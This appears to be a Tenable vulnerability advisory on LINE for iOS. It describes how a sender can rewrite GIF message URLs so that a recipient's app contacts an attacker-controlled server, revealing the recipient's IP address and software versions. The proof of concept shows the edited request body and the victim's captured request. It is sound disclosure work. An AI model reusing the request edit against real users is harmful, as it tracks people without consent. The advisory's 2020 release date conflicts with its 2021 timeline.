Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

LINE Private IP Address and Platform information Disclosure via GIFMagazine

Medium

Synopsis

The LINE messenger application on iOS allows for users to send each other animated GIFs from gifmagazine.net as one of the default message types in the application.

An attacker can proxy the requests made  to api.line.me/message/v3/share during the sending of these GIFs and edit the message contents to point to images (or other content) on an attacker controlled server.

When the message is received in the target's client (which does not require interaction from the target), the target's client will make a request to the attacker-controlled content.

This allows the attacker to record the receiving target's private IP Address, as well as their current Operating System version and LINE application version. 

Proof of Concept:

Using a proxy (in this case Burp Suite) to intercept the request to api.line.me/message/v3/share when sending a GIFMAGAZINE message, and editing the image urls to point to an attacker controlled server (in this case, burpcollaborator.net) allows the attacker to receive the following request:

#####################################################################
Original Request Body
#####################################################################
{"messages":
[{"type":"image",
"originalContentUrl":"https://img.gifmagazine.net/gifmagazine/images/4358290/medium.gif",
"previewImageUrl":"https://img.gifmagazine.net/gifmagazine/images/4358290/180.gif",
"animated":true,
"extension":"gif",
"sentBy":{"label":"Reply with GIFMAGAZINE",
"iconUrl":"https://img.gifmagazine.net/gifmagazine/000web/images/chat-extensions/LINE_chat_app_icon_98px.png",
"linkUrl":"line://app/1626444543-G6O9lb5v?idp=4358290_83"}}]} 

#####################################################################
Edited Request Body
#####################################################################
{"messages":
[{"type":"image",
"originalContentUrl":"https://lb09jovq3r7iuttuv0by06tbz25sth.burpcollaborator.net/medium.gif",
"previewImageUrl":"https://lb09jovq3r7iuttuv0by06tbz25sth.burpcollaborator.net/180.gif",
"animated":true,
"extension":"gif",
"sentBy":{"label":"Reply with GIFMAGAZINE",
"iconUrl":"https://img.gifmagazine.net/gifmagazine/000web/images/chat-extensions/LINE_chat_app_icon_98px.png",
"linkUrl":"line://app/1626444543-G6O9lb5v?idp=4358290_83"}}]}

#####################################################################
Request Received from victim IP, on attacker server ##################################################################### GET /180.gif HTTP/1.1 Host: lb09jovq3r7iuttuv0by06tbz25sth.burpcollaborator.net Accept: */* Accept-Language: en-ca Connection: close Accept-Encoding: gzip, deflate User-Agent: LINE/11.0.0 (iPhone; iOS 14.4; Scale/3.00)

 

Solution

At the time of this writing, this issue is unpatched. The vendor is currently working on a fix.

Disclosure Timeline

February 3, 2021 - Tenable requests security contact.
February 4, 2021 - Vendor provides dedicated security contact.
February 8, 2021 - Tenable discloses vulnerabilities to vendor.
February 9, 2021 - Vendor acknowledges.
March 2, 2021 - Tenable requests status update.
March 8, 2021 - Vendor states that one issue was patched (debug endpoint), is still investigating other (IP disclosure).
March 24, 2021 - Tenable requests status update.
March 29, 2021 - Vendor states that they are looking into fixes.
April 21, 2021 - Tenable requests status update.
May 3, 2021 - Tenable requests status update and reminds vendor of disclosure deadline.
May 4, 2021 - Vendor states patches are in progress. Vendor requests extension. Tenable references disclosure policy and timeline from earlier in disclosure process and denies request.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2021-16
Credit:
Evan Grant, Jimi Sebree, David Wells
Affected Products:
LINE Chat Service
Risk Factor:
Medium

Advisory Timeline

May 11, 2020 - Initial release.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training